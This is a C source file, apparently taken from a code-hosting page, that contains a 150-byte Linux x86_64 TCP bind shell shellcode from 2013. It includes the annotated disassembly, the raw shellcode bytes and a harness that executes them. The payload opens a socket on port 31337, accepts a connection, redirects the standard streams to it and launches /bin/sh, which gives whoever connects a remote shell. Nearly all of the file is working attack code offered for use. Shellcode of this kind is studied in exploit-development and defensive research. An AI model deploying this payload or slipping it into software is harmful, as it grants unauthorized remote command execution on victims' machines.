112 lines
No EOL
4.6 KiB
C
112 lines
No EOL
4.6 KiB
C
/*
|
|
Title : tcpbindshell (150 bytes)
|
|
Date : 04 October 2013
|
|
Author : Russell Willis <codinguy@gmail.com>
|
|
Testd on: Linux/x86_64 (SMP Debian 3.2.46-1+deb7u1 x86_64 GNU/Linux)
|
|
|
|
$ objdump -D tcpbindshell -M intel
|
|
tcpbindshell: file format elf64-x86-64
|
|
Disassembly of section .text:
|
|
|
|
0000000000400080 <_start>:
|
|
400080: 48 31 c0 xor rax,rax
|
|
400083: 48 31 ff xor rdi,rdi
|
|
400086: 48 31 f6 xor rsi,rsi
|
|
400089: 48 31 d2 xor rdx,rdx
|
|
40008c: 4d 31 c0 xor r8,r8
|
|
40008f: 6a 02 push 0x2
|
|
400091: 5f pop rdi
|
|
400092: 6a 01 push 0x1
|
|
400094: 5e pop rsi
|
|
400095: 6a 06 push 0x6
|
|
400097: 5a pop rdx
|
|
400098: 6a 29 push 0x29
|
|
40009a: 58 pop rax
|
|
40009b: 0f 05 syscall
|
|
40009d: 49 89 c0 mov r8,rax
|
|
4000a0: 4d 31 d2 xor r10,r10
|
|
4000a3: 41 52 push r10
|
|
4000a5: 41 52 push r10
|
|
4000a7: c6 04 24 02 mov BYTE PTR [rsp],0x2
|
|
4000ab: 66 c7 44 24 02 7a 69 mov WORD PTR [rsp+0x2],0x697a
|
|
4000b2: 48 89 e6 mov rsi,rsp
|
|
4000b5: 41 50 push r8
|
|
4000b7: 5f pop rdi
|
|
4000b8: 6a 10 push 0x10
|
|
4000ba: 5a pop rdx
|
|
4000bb: 6a 31 push 0x31
|
|
4000bd: 58 pop rax
|
|
4000be: 0f 05 syscall
|
|
4000c0: 41 50 push r8
|
|
4000c2: 5f pop rdi
|
|
4000c3: 6a 01 push 0x1
|
|
4000c5: 5e pop rsi
|
|
4000c6: 6a 32 push 0x32
|
|
4000c8: 58 pop rax
|
|
4000c9: 0f 05 syscall
|
|
4000cb: 48 89 e6 mov rsi,rsp
|
|
4000ce: 48 31 c9 xor rcx,rcx
|
|
4000d1: b1 10 mov cl,0x10
|
|
4000d3: 51 push rcx
|
|
4000d4: 48 89 e2 mov rdx,rsp
|
|
4000d7: 41 50 push r8
|
|
4000d9: 5f pop rdi
|
|
4000da: 6a 2b push 0x2b
|
|
4000dc: 58 pop rax
|
|
4000dd: 0f 05 syscall
|
|
4000df: 59 pop rcx
|
|
4000e0: 4d 31 c9 xor r9,r9
|
|
4000e3: 49 89 c1 mov r9,rax
|
|
4000e6: 4c 89 cf mov rdi,r9
|
|
4000e9: 48 31 f6 xor rsi,rsi
|
|
4000ec: 6a 03 push 0x3
|
|
4000ee: 5e pop rsi
|
|
00000000004000ef <doop>:
|
|
4000ef: 48 ff ce dec rsi
|
|
4000f2: 6a 21 push 0x21
|
|
4000f4: 58 pop rax
|
|
4000f5: 0f 05 syscall
|
|
4000f7: 75 f6 jne 4000ef <doop>
|
|
4000f9: 48 31 ff xor rdi,rdi
|
|
4000fc: 57 push rdi
|
|
4000fd: 57 push rdi
|
|
4000fe: 5e pop rsi
|
|
4000ff: 5a pop rdx
|
|
400100: 48 bf 2f 2f 62 69 6e movabs rdi,0x68732f6e69622f2f
|
|
400107: 2f 73 68
|
|
40010a: 48 c1 ef 08 shr rdi,0x8
|
|
40010e: 57 push rdi
|
|
40010f: 54 push rsp
|
|
400110: 5f pop rdi
|
|
400111: 6a 3b push 0x3b
|
|
400113: 58 pop rax
|
|
400114: 0f 05 syscall
|
|
|
|
Code not is not optimal, this is left as an exercise to the reader ;^)
|
|
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
|
|
#define PORT "\x7a\x69" /* 31337 */
|
|
|
|
unsigned char code[] = \
|
|
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
|
|
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
|
|
"\x4d\x31\xd2\x41\x52\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24\x02"
|
|
PORT"\x48\x89\xe6\x41\x50\x5f\x6a\x10\x5a\x6a\x31\x58\x0f\x05"
|
|
"\x41\x50\x5f\x6a\x01\x5e\x6a\x32\x58\x0f\x05\x48\x89\xe6\x48\x31"
|
|
"\xc9\xb1\x10\x51\x48\x89\xe2\x41\x50\x5f\x6a\x2b\x58\x0f\x05\x59"
|
|
"\x4d\x31\xc9\x49\x89\xc1\x4c\x89\xcf\x48\x31\xf6\x6a\x03\x5e\x48"
|
|
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
|
|
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
|
|
"\x5f\x6a\x3b\x58\x0f\x05";
|
|
|
|
int
|
|
main(void)
|
|
{
|
|
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
|
|
int (*ret)() = (int(*)())code;
|
|
ret();
|
|
return 0;
|
|
} |